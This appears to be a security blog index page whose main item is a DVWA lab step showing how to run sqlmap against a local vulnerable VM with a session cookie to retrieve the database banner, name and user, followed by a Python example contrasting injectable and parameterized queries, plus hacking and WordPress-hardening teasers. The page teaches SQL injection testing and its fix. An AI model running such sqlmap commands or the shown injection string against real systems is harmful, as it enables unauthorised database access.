SQL injection lab PT.4 – Using SqlMap to Obtain Current User and Database


Welcome back Gurkhas ! …in SQL injection lab PT.4 

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial 

Section 10: Using SqlMap to Obtain Current User and Database 

1. Verify sqlmap.py exists
   Instructions:
   1. cd /pentest/database/sqlmap
   2. ls -l sqlmap.py


2. Obtain Database User For DVWA
   Notes (FYI):
   1. Obtain the referer link from (Section 9, Step 10); it is placed after the "-u" flag below.
   2. Obtain the cookie line from (Section 9, Step 10); it is placed after the "--cookie" flag below.
   3. Replace 192.168.1.106 with Fedora’s IP address obtained in (Section 3, Step 3).
   4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
   Instructions:
   1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
      -u, Target URL
      --cookie, HTTP Cookie header
      -b, Retrieve DBMS banner
      --current-db, Retrieve DBMS current database
      --current-user, Retrieve DBMS current user


3. Do you want to keep testing?
   Instructions:
   1. keep testing? y
   2. skip payloads? y


4. Viewing Results
   Instructions:
   1. For the web application DVWA, the database name is “dvwa” and the user the application connects to the database as is “root@localhost”.
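
Why the id parameter in the URL above is injectable, and how the query is fixed, as an added example (not code from the original post or from DVWA). It uses Python's sqlite3 as a stand-in for the lab's database; the users table, its rows and the function names are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the application's users table (sample rows only).
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return db


def lookup_concatenated(db, user_id):
    # Weak pattern: the request's id value is pasted into the SQL text,
    # so the database parses client input as part of the statement.
    sql = (
        "SELECT first_name, last_name FROM users "
        "WHERE user_id = '" + user_id + "'"
    )
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    # Hardened pattern: accept only ASCII digits, then bind the value as data.
    # The SQL text is constant, so input can never change the query's shape.
    if not re.fullmatch(r"[0-9]{1,9}", user_id):
        return []
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tampered = "1' OR '1'='1"  # constructed input that alters the WHERE clause
    for value in ("1", tampered):
        print(repr(value))
        print("  concatenated :", lookup_concatenated(db, value))
        print("  parameterized:", lookup_parameterized(db, value))
```

Parameterizing removes the injection point; connecting the application with a dedicated low-privilege account instead of root limits what any remaining flaw can reach.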


OK Gurkhas, we’ll continue this in the next part.


SQL injection lab PT.3 – Extracting/Obtaining PHP Cookie – HC Nepal

Welcome back Gurkhas ! …in SQL injection lab PT.3

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial

Section 9: Obtain PHP Cookie
1. SQL Injection Menu
   Instructions:
   1. Select “SQL Injection” from the left navigation menu.


2. Select Tamper Data
   Instructions: Read More …


SQL injection lab PT.2 – DVWA Login + Low Security Level Submit – HC Nepal

Welcome back Gurkhas ! …in SQL injection lab PT.2

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial

Let’s start part 2.

Open Console Terminal and Retrieve IP Address
1. Open a console terminal
   Instructions:
   1. Click on the console terminal


2. Get IP Address Read More …


SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL

Hello Gurkhas ! ! !

In this lab, we’ll begin the series on SQL injection. This will be a part-wise article/guide on SQL injection.

By : Bijay Acharya  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://<IP address of Metasploitable>/dvwa/login.php
    Read More …


sqlmap – Automatic SQL injection and database takeover tool

Introduction

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

Read More …


How to Secure Your WordPress Website From Hackers

Millions of websites are powered by WordPress software and there’s a reason for that. WordPress is the most developer-friendly content management system out there, so you can essentially do anything you want with it. Unfortunately, that has some downsides as well.

For example, if you don’t change your default configuration, hackers and some pesky users with too much curiosity immediately know where to log in to get into your admin area. In WordPress, you can just type in domain.com/wp-admin and it will take you right to the login screen. At that point, it’s all about trying to crack your password. The most common method hackers use is brute force, which allows them to test millions of login combinations in a short amount of time.

Giving Hackers a Difficult Time

There are a few different preventive measures you can take in order to minimize the risk of getting your website hacked.


Back Up Your Website Often

Obviously, it depends on how often your website gets updated, but I would suggest at least a weekly backup.

READ FULL ARTICLE HERE


[3 Steps] : Protect Your Website From Hackers

As a webmaster, is there anything more terrifying than the thought of seeing all of your web-developed work being altered or wiped out entirely by a nefarious hacker?  You’ve worked hard on your website – so take the time to protect it by implementing basic hacking protections!

In addition to regularly backing up your files (which you should already be doing, for various reasons), taking the following three easy steps will help to keep your website safe: Read More …
